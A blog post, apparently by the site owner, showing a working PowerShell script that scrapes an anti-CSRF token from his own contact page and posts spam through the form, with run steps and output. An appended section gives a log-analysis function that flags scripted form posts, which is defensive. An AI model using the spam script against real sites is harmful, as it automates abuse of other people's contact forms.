Hacking Anti Cross-site Request Forgery Tokens (CSRF) With PowerShell
I ported the example of how to hack a form protected by an Anti CSRF Token - previously shown in my post What Are Anti Cross-site Request Forgery Tokens And What Are They Good For? - to PowerShell.
How to hack an Anti CSRF Token from PowerShell

    function global:spam-adamdotcom(){

        # Load the assembly containing WebClientWithCookies and RegexUtilities
        [Reflection.Assembly]::LoadFile((Resolve-Path "AdamDotCom.WebClientWithCookies.dll")) | out-null

        # Load the assembly containing System.Web.HttpUtility
        [void][Reflection.Assembly]::LoadWithPartialName("System.Web") | out-null

        # create a new instance of the HTTP Web Client that supports cookies
        $webClient = New-Object AdamDotCom.Common.Service.Utilities.WebClientWithCookies

        # download the page that contains the Anti CSRF Token
        [void] $webClient.DownloadData("http://adam.kahtava.com/contact");

        # use a regular expression to grab the Anti CSRF Token
        # - this is an MVC site so we're looking for a token named "__RequestVerificationToken_Lw__"
        $regex = "__RequestVerificationToken_Lw__=(?<CRSF_Token>[^;]+)"
        $match = [regex]::matches($webClient.ResponseHeaders["Set-Cookie"], $regex)[0]
        $antiCrsfToken = $match.Groups["CRSF_Token"].Captures[0].Value

        write-host "`nYour Anti CRSF Token is: " $antiCrsfToken

        # construct the message including the Anti CSRF Token
        $message = "__RequestVerificationToken=" + [System.Web.HttpUtility]::UrlEncode($antiCrsfToken) +
            "&fromName=Johnathon Fink" +
            "&fromAddress=prancesw@rmcres.com" +
            "&subject=Call for your diploma now" +
            "&body=Is your lack of a degree..."

        # send spam-spam-spam
        $webClient.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
        [void] $webClient.UploadData("http://adam.kahtava.com/contact/send", "POST",
            ([System.Text.Encoding]::UTF8.GetBytes($message)));

        write-host "`nSuccess!!! Your spam has been sent.`n"
    }

To run this script:
- Download the script
- Run PowerShell
- Load the script:
  .\Automated-AntiCSRF-Authentication-Script.ps1
- Start sending spam-spam-spam:
  PS > spam-adamdotcom
Here's the output as seen on my machine:

    PS C:\> .\Automated-AntiCSRF-Authentication-Script.ps1
    PS C:\> spam-adamdotcom

    Your Anti CRSF Token is: f54ZlHS3L1Xyl65dYd1uYYh90ygNKYmCswXJUnr0GYtgcrJdJILsQ2jyFotzc10L

    Success!!! Your spam has been sent.

This example uses a derivative of the .NET Framework's WebClient class with cookies enabled, so it depends on the AdamDotCom.Common.Service.dll assembly (browse the source here). This dependency can be resolved automatically by calling the download-client function, which is also found within the PowerShell script.
Contribute, view, or download the openly available script here: Automated-AntiCSRF-Authentication-Script.ps1
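
The script fetches the form and posts it back to back, and that sequence is visible in server logs. The following is an added example, not part of the original post or its script: it flags POSTs to the send endpoint that arrive faster than a person could fill in the form, or with no preceding form request. The log format, the sample lines, the function name Find-ScriptedFormPost and the 3-second threshold are assumptions made for illustration.

```powershell
# Constructed sample log. Assumed format: ISO-8601 time, client IP, method, path, status.
$sampleLog = @'
2024-01-01T10:00:00.120Z 203.0.113.7 GET /contact 200
2024-01-01T10:00:00.480Z 203.0.113.7 POST /contact/send 200
2024-01-01T10:02:10.000Z 198.51.100.23 GET /contact 200
2024-01-01T10:03:45.000Z 198.51.100.23 POST /contact/send 200
2024-01-01T10:05:00.000Z 192.0.2.50 POST /contact/send 403
'@ -split "`r?`n"

function Find-ScriptedFormPost {
    param(
        [string[]] $LogLine,
        [string]   $FormPath = '/contact',
        [string]   $PostPath = '/contact/send',
        [double]   $MinHumanSeconds = 3.0   # assumed threshold; tune per form
    )
    $pattern  = '^(?<ts>\S+)\s+(?<ip>\S+)\s+(?<method>[A-Z]+)\s+(?<path>\S+)\s+(?<status>\d{3})$'
    $lastForm = @{}   # client IP -> time of its latest form GET (IP is a coarse key behind NAT)
    foreach ($line in $LogLine) {
        $m = [regex]::Match($line.Trim(), $pattern)
        if (-not $m.Success) { continue }   # skip blank or malformed lines
        $ts     = [datetimeoffset]::Parse($m.Groups['ts'].Value, [cultureinfo]::InvariantCulture)
        $ip     = $m.Groups['ip'].Value
        $method = $m.Groups['method'].Value
        $path   = $m.Groups['path'].Value
        if ($method -eq 'GET' -and $path -eq $FormPath) {
            $lastForm[$ip] = $ts
        }
        elseif ($method -eq 'POST' -and $path -eq $PostPath) {
            # Default verdict: the client posted without ever requesting the form.
            $gap    = $null
            $reason = 'post-without-form-get'
            if ($lastForm.ContainsKey($ip)) {
                # Seconds between the form GET and this POST; short gaps suggest a script.
                $gap    = $ts.Subtract($lastForm[$ip]).TotalSeconds
                $reason = if ($gap -lt $MinHumanSeconds) { 'post-too-fast' } else { $null }
            }
            if ($reason) {
                [pscustomobject]@{
                    ClientIp = $ip; Time = $ts; GapSeconds = $gap
                    Status = $m.Groups['status'].Value; Reason = $reason
                }
            }
        }
    }
}

Find-ScriptedFormPost -LogLine $sampleLog | Format-Table -AutoSize
```

Timing is a heuristic, so its results are best fed into rate limiting or a challenge step rather than used to block outright.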